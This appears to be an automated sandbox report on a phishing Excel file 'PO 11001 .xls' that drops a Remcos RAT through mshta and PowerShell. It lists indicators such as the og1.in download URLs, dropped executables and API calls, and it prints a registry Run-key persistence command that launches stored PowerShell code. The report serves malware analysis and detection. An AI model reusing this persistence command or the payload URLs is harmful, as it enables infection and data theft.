          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
          Source: Vaccinerende.exeString found in binary or memory: http://www.ebuddy.com
          Source: Vaccinerende.exeString found in binary or memory: http://www.imvu.com
          Source: Vaccinerende.exeString found in binary or memory: http://www.nirsoft.net/
          Source: powershell.exe, 0000000C.00000002.793905952.0000000003479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 0000000C.00000002.793905952.0000000003479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 0000000C.00000002.793905952.0000000003479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: Vaccinerende.exeString found in binary or memory: https://login.yahoo.com/config/login
          Source: powershell.exe, 00000007.00000002.445540287.0000000012531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.793905952.0000000003479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: mshta.exe, 00000004.00000002.414718403.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414241682.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471568642.00000000003E5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.460570080.00000000003E5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.471985501.00000000003E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/
          Source: mshta.exe, 0000000F.00000003.460570080.0000000000395000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/2Rxzb3
          Source: mshta.exe, 00000004.00000002.414694836.0000000000465000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/2Rxzb3&
          Source: mshta.exe, 0000000F.00000002.471964740.000000000035A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/2Rxzb3C
          Source: mshta.exe, 0000000F.00000003.460570080.0000000000395000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/2Rxzb3W
          Source: mshta.exe, 00000004.00000002.414694836.0000000000465000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/2Rxzb3Z
          Source: mshta.exe, 0000000F.00000002.471964740.000000000035A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/2Rxzb3s
          Source: mshta.exe, 0000000F.00000002.471964740.000000000035A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/2Rxzb3w
          Source: mshta.exe, 0000000F.00000002.471964740.000000000035A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/2Rxzb3yX
          Source: mshta.exe, 00000004.00000002.417244267.000000000332E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/ket
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C421000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
          Source: Vaccinerende.exe, 00000022.00000003.836175427.00000000021E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
          Source: Vaccinerende.exeString found in binary or memory: https://www.google.com
          Source: Vaccinerende.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
          Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
          Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
          Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
          Source: unknownHTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49163 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49165 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49170 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49169 version: TLS 1.2
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 11_2_004053EF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,11_2_004053EF
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,34_2_0040987A
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,34_2_004098E2
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,35_2_00406DFC
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,35_2_00406E9F
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,36_2_004068B5
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,36_2_004072B5
          Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
          Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS

          E-Banking Fraud

          barindex
          Yara detected Remcos RAT
          Source: Yara matchFile source: 00000021.00000002.1004764696.0000000006AA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Vaccinerende.exe PID: 3116, type: MEMORYSTR

          System Summary

          barindex
          Excel sheet contains many unusual embedded objects
          Source: PO 11001 .xlsOLE: Microsoft Excel 2007+
          Source: 54230000.0.drOLE: Microsoft Excel 2007+
          Microsoft Office drops suspicious files
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\cookienetbookinetcahce[1].htaJump to behavior
          Powershell drops PE file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\dllhost.exeJump to dropped file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dllhost[1].exeJump to dropped file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
          Source: C:\Users\user\AppData\Roaming\dllhost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\dllhost.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Windows\SysWOW64\reg.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,34_2_0040DD85
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_00401806 NtdllDefWindowProc_W,34_2_00401806
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_004018C0 NtdllDefWindowProc_W,34_2_004018C0
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_004016FD NtdllDefWindowProc_A,35_2_004016FD
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_004017B7 NtdllDefWindowProc_A,35_2_004017B7
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_00402CAC NtdllDefWindowProc_A,36_2_00402CAC
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_00402D66 NtdllDefWindowProc_A,36_2_00402D66
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 11_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,11_2_0040333D
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 23_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,23_2_0040333D
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 33_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,33_2_0040333D
          Source: C:\Users\user\AppData\Roaming\dllhost.exeFile created: C:\Windows\brandbombernes.lnkJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE897C352E7_2_000007FE897C352E
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 11_2_0040695611_2_00406956
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 11_2_00404C2C11_2_00404C2C
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 23_2_0040695623_2_00406956
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 23_2_00404C2C23_2_00404C2C
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 33_2_0040695633_2_00406956
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 33_2_00404C2C33_2_00404C2C
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0044B04034_2_0044B040
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0043610D34_2_0043610D
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0044731034_2_00447310
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0044A49034_2_0044A490
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0040755A34_2_0040755A
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0043C56034_2_0043C560
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0044B61034_2_0044B610
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0044D6C034_2_0044D6C0
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_004476F034_2_004476F0
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0044B87034_2_0044B870
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0044081D34_2_0044081D
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0041495734_2_00414957
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_004079EE34_2_004079EE
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_00407AEB34_2_00407AEB
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0044AA8034_2_0044AA80
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_00412AA934_2_00412AA9
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_00404B7434_2_00404B74
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_00404B0334_2_00404B03
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0044BBD834_2_0044BBD8
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_00404BE534_2_00404BE5
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_00404C7634_2_00404C76
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_00415CFE34_2_00415CFE
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_00416D7234_2_00416D72
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_00446D3034_2_00446D30
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_00446D8B34_2_00446D8B
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_00406E8F34_2_00406E8F
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_0040503835_2_00405038
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_0041208C35_2_0041208C
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_004050A935_2_004050A9
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_0040511A35_2_0040511A
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_0043C13A35_2_0043C13A
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_004051AB35_2_004051AB
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_0044930035_2_00449300
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_0040D32235_2_0040D322
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_0044A4F035_2_0044A4F0
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_0043A5AB35_2_0043A5AB
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_0041363135_2_00413631
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_0044669035_2_00446690
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_0044A73035_2_0044A730
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_004398D835_2_004398D8
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_004498E035_2_004498E0
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_0044A88635_2_0044A886
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_0043DA0935_2_0043DA09
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_00438D5E35_2_00438D5E
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_00449ED035_2_00449ED0
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_0041FE8335_2_0041FE83
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_00430F5435_2_00430F54
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_004050C236_2_004050C2
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_004014AB36_2_004014AB
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_0040513336_2_00405133
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_004051A436_2_004051A4
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_0040124636_2_00401246
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_0040CA4636_2_0040CA46
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_0040523536_2_00405235
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_004032C836_2_004032C8
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_004222D936_2_004222D9
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_0040168936_2_00401689
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_00402F6036_2_00402F60
          Source: PO 11001 .xlsOLE indicator, VBA macros: true
          Source: PO 11001 .xlsStream path 'MBD0001A431/\x1Ole' : https://og1.in/2Rxzb3y }'8koQD;Qi8_$=m>Lw|:KeDbzI%';dcfl`Hm)1@IMWb[X}hbd`KXZyK1JCrkMa1QsPD709cjaECVc5S9rr4O7xnndbEAP26WuKgDX5ISzgeCCUMyeqEDv17UOqDjuLrhhb25VA1ufgTBFc54gCSOf0Ta98rtRMmeFVCKbBx7JdudpjmJWsQxub2tZ2ZWRPUDnPkHFgRMp8pKlacM9xYL5HA20RUHAvmG6AuX12rnmIhTlvyE3ptVeGQp7QZzsucXDoTU9NqjwNksd5Si0H59obXupLBLg51Akg4s=CNW%3p+6DYNj
          Source: 54230000.0.drStream path 'MBD0001A431/\x1Ole' : https://og1.in/2Rxzb3y }'8koQD;Qi8_$=m>Lw|:KeDbzI%';dcfl`Hm)1@IMWb[X}hbd`KXZyK1JCrkMa1QsPD709cjaECVc5S9rr4O7xnndbEAP26WuKgDX5ISzgeCCUMyeqEDv17UOqDjuLrhhb25VA1ufgTBFc54gCSOf0Ta98rtRMmeFVCKbBx7JdudpjmJWsQxub2tZ2ZWRPUDnPkHFgRMp8pKlacM9xYL5HA20RUHAvmG6AuX12rnmIhTlvyE3ptVeGQp7QZzsucXDoTU9NqjwNksd5Si0H59obXupLBLg51Akg4s=CNW%3p+6DYNj
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: String function: 0040624C appears 34 times
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: String function: 00402C37 appears 52 times
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 004169A7 appears 86 times
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 0044DB70 appears 41 times
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 004165FF appears 35 times
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 00422297 appears 42 times
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 00444B5A appears 37 times
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 00413025 appears 79 times
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 00416760 appears 69 times
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
          Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winXLS@72/66@4/5
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,34_2_004182CE
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 11_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,11_2_0040333D
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 23_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,23_2_0040333D
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 33_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,33_2_0040333D
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,36_2_00410DE1
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 11_2_0040483D getwchar,GetDiskFreeSpaceW,MulDiv,11_2_0040483D
